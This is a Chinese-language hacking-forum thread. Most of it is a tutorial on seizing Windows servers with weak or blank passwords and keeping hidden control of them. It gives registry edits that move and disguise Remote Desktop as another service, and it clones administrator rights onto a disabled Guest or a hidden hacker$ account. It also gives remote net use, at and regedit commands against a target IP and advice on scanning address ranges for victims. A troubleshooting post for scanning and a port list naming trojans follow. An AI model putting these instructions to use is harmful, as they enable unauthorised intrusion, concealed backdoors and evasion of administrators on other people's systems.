关了退出SQL Server再用SQL Server身位验证进一次.退出(这是为了不留下记录) 八.改3389端口和服务名称修改服务器端的端口设置，注册表有2个地方需要修改。 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] PortNumber值，默认是3389，选择10进制修改成所希望的端口，比如1314 第二个地方： [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] PortNumber值，默认是3389，选择10进制修改成所希望的端口，比如1314 要重启系统才能用新端口连.(不急..改了他的服务名再重启系统吧) 导出3389服务的 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] 的键值为mm.reg文件. 编辑mm.reg文件.替换TermService为Alerter(错误警告服务..别的服务也行) 再把第十行的"Description"="(这里是服务说明..改为你所换的服务说明..这里改为通知所选用户和计算机有关系统管理级警报。)" 第十一行的"DisplayName"="(这里是服务名称..改为你所换的服务名称..这里改为Alerter) 保存..再导入注册表(这里要先运行Services.msc(可在CMD下打这命令)服务管理器..把Alerter的服务先停止) 再在CMD下 CD c:\winnt\system32 copy termsrv.exe service.exe(这里是复制termsrv.exe为Alerter服务文件名差不多的文件) CD C:\winnt sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe(这里是从新定向Alerter服务文件.服务名一定要区分大小写A要大写) 九.注消后(注消比直接关要好些)..用Radmin重启肉鸡.. 十.使用被禁用的帐户[Guest]登陆.删除自己开始建的帐号 1.使用psu.exe展开注册表到 HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 用法：[psu -p regedit -i pid] Pid 的值为在任务栏空白处点右键-->>任务管理器--->>进程中的winlogon.exe后面的数值就是PID数值如:psu –p regedit –i 157 将Guest克成管理员权限克成管理员权限的方法: 找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator的类型值. 在HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\下找到这个类型值在复制数值名为F的数值数剧覆盖相应的Guest的类型值(找的方法一样) 导出Guest的配置(也就是导出HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Guest和他相应的类型值的数据) 然后删除Guest的配置 2.查看计算机管理中帐户列表刷新这时候会出现错误[找不到帐户](跳过这步也行) 3.将Guest的配置(二个REG文件导进注册表) 4.修改Guest帐户密码,命令行下禁用Guest帐户[一定是命令行下] net user Guest **** [修改密码] net user Guest /active:yes net user Guest /active:no[命令行下禁用Guest] 5.实验被禁止的帐户Guest是否可用. 6.用Guest登陆后删除自己建的帐号 net user mint /del 整个过程结束最后最好把RADMIN的服务也改了..多留个后门多条路..呵呵整个过程全部结束..这机子就真正变成你的肉鸡了... 文章里面的内容都是以下动画的内容(通过我自己的理解写的..也许存在许多错误..希望对和偶一样的菜鸟有帮助) 作者： 125.90.34.* 2006-7-14 23:30 回复此发言 -------------------------------------------------------------------------------- 3 SA空口令入侵到3389终结完整编笑语☆嫣然的《终结3389》 mervin制作 <《终结3389》补充版> 孤狼望月 <使用被禁用的帐户[Guest]登陆> (他还有个(隐藏帐号后门教程)也差不多) 碎片最后送一个找固定IP肉鸡的方法: 菜菜鸟教程之－如何提高扫描到肉鸡的机会 BY：网络凡人先找个有不正常端口的代理，代理我一般到网迷之家(www.52cyq.com)拿的。就这个好了 218.58.88.15:45576 [山东省青岛市](我的是教育网，扫描不到国外的机的，所以用国内的IP来做试范），我把它扩充了整一个网段。由218.58.88.1－218.58.88.255你可以扩充成218.58.80.1－ 218.58.90.255 .端口为了减少动画的大小，就扫描3389好了，。IP扩充多少就要看你的网快还是慢。快的就扩充多点，慢的只扫描一个c段IP好了。看到没有，[218.58.88.8]: 发现 NT-Server弱口令: Administrator/[空口令]就是这么简单就可以扫描到肉鸡的，记得，我这里出不了国外，才扫描国内的机。你们扫描国外的机，不要扫描国内的机啊～如果发生了什么事，公安会找你的哦。好了。扫描就说到这了。、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add 2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。 3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。 4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。打开键：HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\hacker$" 5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键"F"的值复制，并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。 6、在命令行下执行net user hacker$ /del将用户hacker$删除：net user hacker$ /del 7、在regedit.exe的窗口内按F5刷新，然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可 8、到此，隐藏的超级用户hacker$已经建好了，然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\SAM\SAM键权限改回原来的样子（只要删除添加的帐户administrator即可）。 9、注意：隐藏的超级用户建好后，在帐户管理器看不到hacker$这个用户，在命令行用“net user”命令也看不到，但是超级用户建立以后，就不能再改密码了，如果用net user命令来改hacker$的密码的话，那么在帐户管理器中将又会看这个隐藏的超级用户了，而且不能删除。如何在命令行下远程建立隐藏的超级用户在这里将用at的命令，因为用at产生的计划任务是以系统身份运行的，所以也用不到psu.exe程序。为了能够使用at命令，肉鸡必须开有schedule的服务，如果没有开启，可用流光里带的工具netsvc.exe或sc.exe来远程启动，当然其方法也可以，只要能启动schedule服务就行。对于命令行方式，你可以采用各种连接方式，如用SQLexec连接MSSQL的1433端口，也可以用telnet服务，只要以你能得到一个cmdshell，并且有运行at命令的权限就可以。 1、首先找到一台肉鸡，至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡，现在我们开始在命令行下远程为它建立隐藏的超级用户。（例子中的主机是我的局域网内的一台主机，我将它的ip地址改为13.50.97.238,，请勿在互联网上对号入座,以免骚扰正常的ip地址。）作者： 125.90.34.* 2006-7-14 23:30 回复此发言 -------------------------------------------------------------------------------- 4 SA空口令入侵到3389终结完整编 2、先与肉鸡建立连接,命令为: net use \\13.50.97.238\ipc$ "12345678" /user:"administrator 3、用at命令在肉鸡上建立一个用户(如果at服务没有启动，可用小榕的netsvc.exe或sc.exe来远程启动):at \\13.50.97.238 12:51 c:\winnt\system32\net.exe user hacker$ 1234 /add 建立这个加有$符的用户名，是因为加有$符后，命令行下用net user将不显示这个用户，但在帐户管理器却能看到这个用户。 4、同样用at命令导出HKEY_LOCAL_MACHINE\sam\sam\Domains\account\users下键值：at \\13.50.97.238 12:55 c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\ /e 是regedit.exe的参数，在_LOCAL_MACHINE\SAM\SAM\Domains\account\users\这个键的一定要以\结尾。必要的情况下可以用引号将"c:\winnt\regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\account\users\"引起来。 5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为：copy \\13.50.97.238\admin$\system32\hacker.reg c:\hacker.reg 修改的方法图形界中已经介绍过了，这里就不作介绍了。 6、再将编辑好的hacker.reg拷回肉鸡上 copy c:\hacker.reg \\13.50.97.238\admin$\system32\hacker1.reg 7、查看肉鸡时间：net time \\13.50.97.238 然后用at命令将用户hacker$删除: at \\13.50.97.238 13:40 net user hacker$ /del 8、验证hacker$是否删除:用 net use \\13.50.97.238 /del 断开与肉鸡的连接。 net use \\13.50.97.238\ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接，不能连接说明已删除。 9、再与肉鸡建立连接：net use \\13.50.97.238\ipc$ "12345678" /user:"administrator" 再取得肉鸡时间，用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表: at \\13.50.97.238 13:41 c:\winnt\regedit.exe /s hacker1.reg regedit.exe的参数/s是指安静模式。 10、再验证hacker$是否已建立，方法同上面验证hacker$是否被删除一样。 11、再验证用户hacker$是否有读、写、删的权限，如果不放心，你还可验证是否能建立其它帐户。 12、通过11可以断定用户hacker$具有超级用户权限，因为最初我用at命令建立它的时候是一个普通用户，而现在却具有远程读、写、删的权限。三、如果肉鸡没有开3389终端服务，而我又不想用命令行，怎么办？这种情况下，你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能，你可以用regedt32.exe来为远程主机的注册表项设置权限，用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能，你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似，我就不多说了，只它的速度实在是令人难以忍受。但是这里有两个前提：1、先用net use \\肉鸡ip\ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后，才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。 2、远程主机必须开启远程注册表服务（没有开启的话，你也可以远程开启，因为你有超级用户的密码了）。四、利用被禁用的帐户建立隐藏的超级用户：我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下: 1．想办法查看有哪些用户被细心的管理员禁止，一般情况下，有些管理员出于安全考虑，通常会将guest禁用，当然了会禁用其它用户。在图形界面下，非常容易，只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉；而在命令行下，我还没有想到好的办法，只能在命令行下用命令："net user 用户名"一个一个来查看用户是否被禁用。 2．在这里，我们假设用户hacker被管理员禁用。首先，我先用小榕的超组用户克隆程序CA.exe，将被禁用的用户hacker 克隆成超级用户（克隆之后，被禁用的用户hacker就会自动被激活了）: CA.EXE \\肉鸡ip Administrator 超级用户密码 hacher hacher密码。作者： 125.90.34.* 2006-7-14 23:30 回复此发言 -------------------------------------------------------------------------------- 5 SA空口令入侵到3389终结完整编 3．如果你现在一个cmdshell，如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以，这时你只要输入命令： net user hacker /active:no 这样用户hacker就被禁用了（至少表面上是这样的），当然你也可以将用户hacher换成其它的被禁用的用户。 4．这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了，但事实上是这样的吗？你用这个被禁用的用户连接一下肉鸡看看是否能连上？用命令：net user \\肉鸡ip\ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家，经过我多次试验，次次都能成功，而且还是超级用户权限。 5．如果没有cmdshell怎么办？你可以我上面介绍的at命令来禁用用户hacker;命令格式：at \\肉鸡ip 时间 net user hacker /active:no 6．原理：具体的高深的原理我也说不上来，我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看，肯定会弹出一对话框，并禁止你继续禁用超级用户administrator，同样，因为在克隆时，hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代，因而hacker就具有了超级用户的权限了，但是由于hacker在注册表内"C"健还是原来的"C"键，所以hacker还是会被禁用，但是它的超级用户权限却不会被禁用，因此被禁用的用户hacker还是可以连接肉鸡，而且还具有超级用户的权限。具体我也说不明白，大家权且这么理解吧。五、注意的几点事项： 1、隐藏的超级用户建立以后，在帐户管理器中和命令行下均看不到这个用户，但这个用户却存在。 2、隐藏的超级用户建立以后，就不能再修改密码了，因为一旦修改密码，这个隐藏的超级用户就会暴露在帐户管理器中，而且不能删除。 3、如在本机上试验时，最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份，因为本人做试验时，曾出现过帐户管理器中看不到任何用户，组中也看不到任何组的现象，但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。 4、本方法在2000/XP上测试通过，未在NT上测试。本方法仅供研究，请勿将本方法用于破坏上，利用本方法造成严重后果者，由使用者负责，本人概不负责

第二课为什么你扫不到肉鸡呢？

414664728@qq.com(天) — Fri, 22 May 2009 04:12:53 GMT

扫不出肉鸡有很多的可能!一般有如下的情况!
　　1.你系统的防火墙,或某些补丁作怪!
　　2.有些地方是扫不到肉鸡的(是不是和各地的电信有关,暂时还不知道)
　　3.机子设置有关!
　　4.扫描的网段没有肉鸡(空IPC的2000机子,其实现在已比较少的了)
　　5.XP扫描肉鸡,是比较难扫到肉鸡的(2000和XP的IPC扫描有所不同,软件中是利用系统自带的IPC验证功能,至于XP系统的IPC扫描为什么会比较难,是和系统有关)
　　6.有些路由作了扫描限制
　　7,需要的服务没开启，请开启他,Workstation,Server
　　8.绑定句柄无效。的解决方法
　　这是因为UDP端口137给禁止向外开放造成!请开放137端口
　　请注意，XP是比较难扫到主机的! 加上补丁的关系，IPC漏洞在XP系统下扫，基本没有可用主机!
　　2000系统还可以扫到不少的主机! 可能因为很少人用2000扫的关系吧!
　　问:错误: 1702 绑定句柄无效。
　　答:可以关掉防火墙试试，我有天网防火墙时就会这样!
　　如果还不成，利用远程开TELNET的功能!
　　问:打开service control manager database出错! 拒绝访问
　　答:权限不够
　　问：错误53 找不到网络途径
　　答：IP不可用，或者是无法读取主机的信息，可能有防火墙

第一课 TCP端口

414664728@qq.com(天) — Fri, 22 May 2009 04:00:55 GMT

TCP 1=TCP Port Service Multiplexer
TCP 2=Death
TCP 5=Remote Job Entry,yoyo
TCP 7=Echo
TCP 11=Skun
TCP 12=Bomber
TCP 16=Skun
TCP 17=Skun
TCP 18=消息传输协议,skun
TCP 19=Skun
TCP 20=FTP Data,Amanda
TCP 21=文件传输,Back Construction,Blade Runner,Doly Trojan,Fore,FTP trojan,Invisible FTP,Larva, WebEx,WinCrash
TCP 22=远程登录协议
TCP 23=远程登录(Telnet),Tiny Telnet Server (= TTS)
TCP 25=电子邮件(SMTP),Ajan,Antigen,Email Password Sender,Happy 99,Kuang2,ProMail trojan,Shtrilitz,Stealth,Tapiras,Terminator,WinPC,WinSpy,Haebu Coceda
TCP 27=Assasin
TCP 28=Amanda
TCP 29=MSG ICP
TCP 30=Agent 40421
TCP 31=Agent 31,Hackers Paradise,Masters Paradise,Agent 40421
TCP 37=Time,ADM worm
TCP 39=SubSARI
TCP 41=DeepThroat,Foreplay
TCP 42=Host Name Server
TCP 43=WHOIS
TCP 44=Arctic
TCP 48=DRAT
TCP 49=主机登录协议
TCP 50=DRAT
TCP 51=IMP Logical Address Maintenance,Fuck Lamers Backdoor
TCP 52=MuSka52,Skun
TCP 53=DNS,Bonk (DOS Exploit)
TCP 54=MuSka52
TCP 58=DMSetup
TCP 59=DMSetup
TCP 63=whois++
TCP 64=Communications Integrator
TCP 65=TACACS-Database Service
TCP 66=Oracle SQL*NET,AL-Bareki
TCP 67=Bootstrap Protocol Server
TCP 68=Bootstrap Protocol Client
TCP 69=W32.Evala.Worm,BackGate Kit,Nimda,Pasana,Storm,Storm worm,Theef,Worm.Cycle.a
TCP 70=Gopher服务,ADM worm
TCP 79=用户查询(Finger),Firehotcker,ADM worm
TCP 80=超文本服务器(Http),Executor,RingZero
TCP 81=Chubo,Worm.Bbeagle.q
TCP 82=Netsky-Z
TCP 88=Kerberos krb5服务
TCP 99=Hidden Port
TCP 102=消息传输代理
TCP 108=SNA网关访问服务器
TCP 109=Pop2
TCP 110=电子邮件(Pop3),ProMail
TCP 113=Kazimas, Auther Idnet
TCP 115=简单文件传输协议
TCP 118=SQL Services, Infector 1.4.2
TCP 119=新闻组传输协议(Newsgroup(Nntp)), Happy 99
TCP 121=JammerKiller, Bo jammerkillah
TCP 123=网络时间协议(NTP),Net Controller
TCP 129=Password Generator Protocol
TCP 133=Infector 1.x
TCP 135=微软DCE RPC end-point mapper服务
TCP 137=微软Netbios Name服务(网上邻居传输文件使用)
TCP 138=微软Netbios Name服务(网上邻居传输文件使用)
TCP 139=微软Netbios Name服务(用于文件及打印机共享)
TCP 142=NetTaxi
TCP 143=IMAP
TCP 146=FC Infector,Infector
TCP 150=NetBIOS Session Service
TCP 156=SQL服务器
TCP 161=Snmp
TCP 162=Snmp-Trap
TCP 170=A-Trojan
TCP 177=X Display管理控制协议
TCP 179=Border网关协议(BGP)
TCP 190=网关访问控制协议(GACP)
TCP 194=Irc
TCP 197=目录定位服务(DLS)
TCP 256=Nirvana
TCP 315=The Invasor
TCP 371=ClearCase版本管理软件
TCP 389=Lightweight Directory Access Protocol (LDAP)
TCP 396=Novell Netware over IP
TCP 420=Breach
TCP 421=TCP Wrappers
TCP 443=安全服务
TCP 444=Simple Network Paging Protocol(SNPP)
TCP 445=Microsoft-DS
TCP 455=Fatal Connections
TCP 456=Hackers paradise,FuseSpark
TCP 458=苹果公司QuickTime
TCP 513=Grlogin
TCP 514=RPC Backdoor
TCP 520=Rip
TCP 531=Rasmin,Net666
TCP 544=kerberos kshell
TCP 546=DHCP Client
TCP 547=DHCP Server
TCP 548=Macintosh文件服务
TCP 555=Ini-Killer,Phase Zero,Stealth Spy
TCP 569=MSN
TCP 605=SecretService
TCP 606=Noknok8
TCP 660=DeepThroat
TCP 661=Noknok8
TCP 666=Attack FTP,Satanz Backdoor,Back Construction,Dark Connection Inside 1.2
TCP 667=Noknok7.2
TCP 668=Noknok6
TCP 669=DP trojan
TCP 692=GayOL
TCP 707=Welchia,nachi
TCP 777=AIM Spy
TCP 808=RemoteControl,WinHole
TCP 815=Everyone Darling
TCP 901=Backdoor.Devil
TCP 911=Dark Shadow
TCP 993=IMAP
TCP 999=DeepThroat
TCP 1000=Der Spaeher
TCP 1001=Silencer,WebEx,Der Spaeher
TCP 1003=BackDoor
TCP 1010=Doly
TCP 1011=Doly
TCP 1012=Doly
TCP 1015=Doly
TCP 1016=Doly
TCP 1020=Vampire
TCP 1023=Worm.Sasser.e
TCP 1024=NetSpy.698(YAI)
TCP 1059=nimreg
//TCP 1025=NetSpy.698,Unused Windows Services Block
//TCP 1026=Unused Windows Services Block
//TCP 1027=Unused Windows Services Block
//TCP 1028=Unused Windows Services Block
//TCP 1029=Unused Windows Services Block
//TCP 1030=Unused Windows Services Block
//TCP 1033=Netspy
//TCP 1035=Multidropper
//TCP 1042=Bla
//TCP 1045=Rasmin
//TCP 1047=GateCrasher
//TCP 1050=MiniCommand
TCP 1069=Backdoor.TheefServer.202
TCP 1070=Voice,Psyber Stream Server,Streaming Audio Trojan
TCP 1080=Wingate,Worm.BugBear.B,Worm.Novarg.B
//TCP 1090=Xtreme, VDOLive
//TCP 1092=LoveGate
//TCP 1095=Rat
//TCP 1097=Rat
//TCP 1098=Rat
//TCP 1099=Rat
TCP 1110=nfsd-keepalive
TCP 1111=Backdoor.AIMVision
TCP 1155=Network File Access
//TCP 1170=Psyber Stream Server,Streaming Audio trojan,Voice
//TCP 1200=NoBackO
//TCP 1201=NoBackO
//TCP 1207=Softwar
//TCP 1212=Nirvana,Visul Killer
//TCP 1234=Ultors
//TCP 1243=BackDoor-G, SubSeven, SubSeven Apocalypse
//TCP 1245=VooDoo Doll
//TCP 1269=Mavericks Matrix
//TCP 1313=Nirvana
//TCP 1349=BioNet
TCP 1433=Microsoft SQL服务
//TCP 1441=Remote Storm
//TCP 1492=FTP99CMP(BackOriffice.FTP)
TCP 1503=NetMeeting T.120
//TCP 1509=Psyber Streaming Server
//TCP 1600=Shivka-Burka
//TCP 1703=Exloiter 1.1
TCP 1720=NetMeeting H.233 call Setup
TCP 1731=NetMeeting音频调用控制
//TCP 1807=SpySender
//TCP 1966=Fake FTP 2000
//TCP 1976=Custom port
//TCP 1981=Shockrave
TCP 1990=stun-p1 cisco STUN Priority 1 port
TCP 1990=stun-p1 cisco STUN Priority 1 port
TCP 1991=stun-p2 cisco STUN Priority 2 port
TCP 1992=stun-p3 cisco STUN Priority 3 port,ipsendmsg IPsendmsg
TCP 1993=snmp-tcp-port cisco SNMP TCP port
TCP 1994=stun-port cisco serial tunnel port
TCP 1995=perf-port cisco perf port
TCP 1996=tr-rsrb-port cisco Remote SRB port
TCP 1997=gdp-port cisco Gateway Discovery Protocol
TCP 1998=x25-svc-port cisco X.25 service (XOT)
//TCP 1999=BackDoor, TransScout
//TCP 2000=Der Spaeher,INsane Network
TCP 2002=W32.Beagle.AX @mm
//TCP 2001=Transmisson scout
//TCP 2002=Transmisson scout
//TCP 2003=Transmisson scout
//TCP 2004=Transmisson scout
//TCP 2005=TTransmisson scout
TCP 2011=cypress
TCP 2015=raid-cs
//TCP 2023=Ripper,Pass Ripper,Hack City Ripper Pro
TCP 2049=NFS
//TCP 2115=Bugs
//TCP 2121=Nirvana
//TCP 2140=Deep Throat, The Invasor
//TCP 2155=Nirvana
//TCP 2208=RuX
//TCP 2255=Illusion Mailer
//TCP 2283=HVL Rat5
//TCP 2300=PC Explorer
//TCP 2311=Studio54
TCP 2556=Worm.Bbeagle.q
//TCP 2565=Striker
//TCP 2583=WinCrash
//TCP 2600=Digital RootBeer
//TCP 2716=Prayer Trojan
TCP 2745=Worm.BBeagle.k
//TCP 2773=Backdoor,SubSeven
//TCP 2774=SubSeven2.1&2.2
//TCP 2801=Phineas Phucker
//TCP 2989=Rat
//TCP 3024=WinCrash trojan
TCP 3127=Worm.Novarg
TCP 3128=RingZero,Worm.Novarg.B
//TCP 3129=Masters Paradise
//TCP 3150=Deep Throat, The Invasor
TCP 3198=Worm.Novarg
//TCP 3210=SchoolBus
TCP 3332=Worm.Cycle.a
TCP 3333=Prosiak
TCP 3389=超级终端
//TCP 3456=Terror
//TCP 3459=Eclipse 2000
//TCP 3700=Portal of Doom
//TCP 3791=Eclypse
//TCP 3801=Eclypse
TCP 3996=Portal of Doom,RemoteAnything
TCP 4000=腾讯QQ客户端
TCP 4060=Portal of Doom,RemoteAnything
TCP 4092=WinCrash
TCP 4242=VHM
TCP 4267=SubSeven2.1&2.2
TCP 4321=BoBo
TCP 4444=Prosiak,Swift remote
TCP 4500=W32.HLLW.Tufas
TCP 4567=File Nail
TCP 4590=ICQTrojan
TCP 4899=Remote Administrator服务器
TCP 4950=ICQTrojan
TCP 5000=WindowsXP服务器,Blazer 5,Bubbel,Back Door Setup,Sockets de Troie
TCP 5001=Back Door Setup, Sockets de Troie
TCP 5002=cd00r,Shaft
TCP 5011=One of the Last Trojans (OOTLT)
TCP 5025=WM Remote KeyLogger
TCP 5031=Firehotcker,Metropolitan,NetMetro
TCP 5032=Metropolitan
TCP 5190=ICQ Query
TCP 5321=Firehotcker
TCP 5333=Backage Trojan Box 3
TCP 5343=WCrat
TCP 5400=Blade Runner, BackConstruction1.2
TCP 5401=Blade Runner,Back Construction
TCP 5402=Blade Runner,Back Construction
TCP 5471=WinCrash
TCP 5512=Illusion Mailer
TCP 5521=Illusion Mailer
TCP 5550=Xtcp,INsane Network
TCP 5554=Worm.Sasser
TCP 5555=ServeMe
TCP 5556=BO Facil
TCP 5557=BO Facil
TCP 5569=Robo-Hack
TCP 5598=BackDoor 2.03
TCP 5631=PCAnyWhere data
TCP 5632=PCAnyWhere
TCP 5637=PC Crasher
TCP 5638=PC Crasher
TCP 5698=BackDoor
TCP 5714=Wincrash3
TCP 5741=WinCrash3
TCP 5742=WinCrash
TCP 5760=Portmap Remote Root Linux Exploit
TCP 5880=Y3K RAT
TCP 5881=Y3K RAT
TCP 5882=Y3K RAT
TCP 5888=Y3K RAT
TCP 5889=Y3K RAT
TCP 5900=WinVnc
TCP 6000=Backdoor.AB
TCP 6006=Noknok8
TCP 6129=Dameware Nt Utilities服务器
TCP 6272=SecretService
TCP 6267=广外女生
TCP 6400=Backdoor.AB,The Thing
TCP 6500=Devil 1.03
TCP 6661=Teman
TCP 6666=TCPshell.c
TCP 6667=NT Remote Control,Wise 播放器接收端口
TCP 6668=Wise Video广播端口
TCP 6669=Vampyre
TCP 6670=DeepThroat,iPhone
TCP 6671=Deep Throat 3.0
TCP 6711=SubSeven
TCP 6712=SubSeven1.x
TCP 6713=SubSeven
TCP 6723=Mstream
TCP 6767=NT Remote Control
TCP 6771=DeepThroat
TCP 6776=BackDoor-G,SubSeven,2000 Cracks
TCP 6777=Worm.BBeagle
TCP 6789=Doly Trojan
TCP 6838=Mstream
TCP 6883=DeltaSource
TCP 6912=Shit Heep
TCP 6939=Indoctrination
TCP 6969=GateCrasher, Priority, IRC 3
TCP 6970=RealAudio,GateCrasher
TCP 7000=Remote Grab,NetMonitor,SubSeven1.x
TCP 7001=Freak88
TCP 7201=NetMonitor
TCP 7215=BackDoor-G, SubSeven
TCP 7001=Freak88,Freak2k
TCP 7300=NetMonitor
TCP 7301=NetMonitor
TCP 7306=NetMonitor,NetSpy 1.0
TCP 7307=NetMonitor, ProcSpy
TCP 7308=NetMonitor, X Spy
TCP 7323=Sygate服务器端
TCP 7424=Host Control
TCP 7511=聪明基因
TCP 7597=Qaz
TCP 7609=Snid X2
TCP 7626=冰河
TCP 7777=The Thing
TCP 7789=Back Door Setup, ICQKiller
TCP 7983=Mstream
TCP 8000=腾讯OICQ服务器端,XDMA
TCP 8010=Wingate,Logfile
TCP 8011=WAY2.4
TCP 8080=WWW 代理,Ring Zero,Chubo,Worm.Novarg.B
TCP 8102=网络神偷
TCP
8181=W32.Erkez.D@mm
TCP 8520=W32.Socay.Worm
TCP 8594=I-Worm/Bozori.a
TCP 8787=BackOfrice 2000
TCP 8888=Winvnc
TCP 8897=Hack Office,Armageddon
TCP 8989=Recon
TCP 9000=Netministrator
TCP 9325=Mstream
TCP 9400=InCommand 1.0
TCP 9401=InCommand 1.0
TCP 9402=InCommand 1.0
TCP 9872=Portal of Doom
TCP 9873=Portal of Doom
TCP 9874=Portal of Doom
TCP 9875=Portal of Doom
TCP 9876=Cyber Attacker
TCP 9878=TransScout
TCP 9989=Ini-Killer
TCP 9898=Worm.Win32.Dabber.a
TCP 9999=Prayer Trojan
TCP 10067=Portal of Doom
TCP 10080=Worm.Novarg.B
TCP 10084=Syphillis
TCP 10085=Syphillis
TCP 10086=Syphillis
TCP 10101=BrainSpy
TCP 10167=Portal Of Doom
TCP 10168=Worm.Supnot.78858.c,Worm.LovGate.T
TCP 10520=Acid Shivers
TCP 10607=Coma trojan
TCP 10666=Ambush
TCP 11000=Senna Spy
TCP 11050=Host Control
TCP 11051=Host Control
TCP 11223=Progenic,Hack ’99KeyLogger
TCP 11831=TROJ_LATINUS.SVR
TCP 12076=Gjamer, MSH.104b
TCP 12223=Hack’99 KeyLogger
TCP 12345=GabanBus, NetBus 1.6/1.7, Pie Bill Gates, X-bill
TCP 12346=GabanBus, NetBus 1.6/1.7, X-bill
TCP 12349=BioNet
TCP 12361=Whack-a-mole
TCP 12362=Whack-a-mole
TCP 12363=Whack-a-mole
TCP 12378=W32/Gibe@MM
TCP 12456=NetBus
TCP 12623=DUN Control
TCP 12624=Buttman
TCP 12631=WhackJob, WhackJob.NB1.7
TCP 12701=Eclipse2000
TCP 12754=Mstream
TCP 13000=Senna Spy
TCP 13010=Hacker Brazil
TCP 13013=Psychward
TCP 13223=Tribal Voice的聊天程序PowWow
TCP 13700=Kuang2 The Virus
TCP 14456=Solero
TCP 14500=PC Invader
TCP 14501=PC Invader
TCP 14502=PC Invader
TCP 14503=PC Invader
TCP 15000=NetDaemon 1.0
TCP 15092=Host Control
TCP 15104=Mstream
TCP 16484=Mosucker
TCP 16660=Stacheldraht (DDoS)
TCP 16772=ICQ Revenge
TCP 16959=Priority
TCP 16969=Priority
TCP 17027=提供广告服务的Conducent"adbot"共享软件
TCP 17166=Mosaic
TCP 17300=Kuang2 The Virus
TCP 17490=CrazyNet
TCP 17500=CrazyNet
TCP 17569=Infector 1.4.x + 1.6.x
TCP 17777=Nephron
TCP 18753=Shaft (DDoS)
TCP 19191=蓝色火焰
TCP 19864=ICQ Revenge
TCP 20000=Millennium II (GrilFriend)
TCP 20001=Millennium II (GrilFriend)
TCP 20002=AcidkoR
TCP 20034=NetBus 2 Pro
TCP 20168=Lovgate
TCP 20203=Logged,Chupacabra
TCP 20331=Bla
TCP 20432=Shaft (DDoS)
TCP 20808=Worm.LovGate.v.QQ
TCP 21335=Tribal Flood Network,Trinoo
TCP 21544=Schwindler 1.82,GirlFriend
TCP 21554=Schwindler 1.82,GirlFriend,Exloiter 1.0.1.2
TCP 22222=Prosiak,RuX Uploader 2.0
TCP 22784=Backdoor.Intruzzo
TCP 23432=Asylum 0.1.3
TCP 23444=网络公牛
TCP 23456=Evil FTP, Ugly FTP, WhackJob
TCP 23476=Donald Dick
TCP 23477=Donald Dick
TCP 23777=INet Spy
TCP 26274=Delta
TCP 26681=Spy Voice
TCP 27374=Sub Seven 2.0+, Backdoor.Baste
TCP 27444=Tribal Flood Network,Trinoo
TCP 27665=Tribal Flood Network,Trinoo
TCP 29431=Hack Attack
TCP 29432=Hack Attack
TCP 29104=Host Control
TCP 29559=TROJ_LATINUS.SVR
TCP 29891=The Unexplained
TCP 30001=Terr0r32
TCP 30003=Death,Lamers Death
TCP 30029=AOL trojan
TCP 30100=NetSphere 1.27a,NetSphere 1.31
TCP 30101=NetSphere 1.31,NetSphere 1.27a
TCP 30102=NetSphere 1.27a,NetSphere 1.31
TCP 30103=NetSphere 1.31
TCP 30303=Sockets de Troie
TCP 30722=W32.Esbot.A
TCP 30947=Intruse
TCP 30999=Kuang2
TCP 31336=Bo Whack
TCP 31337=Baron Night,BO client,BO2,Bo Facil,BackFire,Back Orifice,DeepBO,Freak2k,NetSpy
TCP 31338=NetSpy,Back Orifice,DeepBO
TCP 31339=NetSpy DK
TCP 31554=Schwindler
TCP 31666=BOWhack
TCP 31778=Hack Attack
TCP 31785=Hack Attack
TCP 31787=Hack Attack
TCP 31789=Hack Attack
TCP 31791=Hack Attack
TCP 31792=Hack Attack
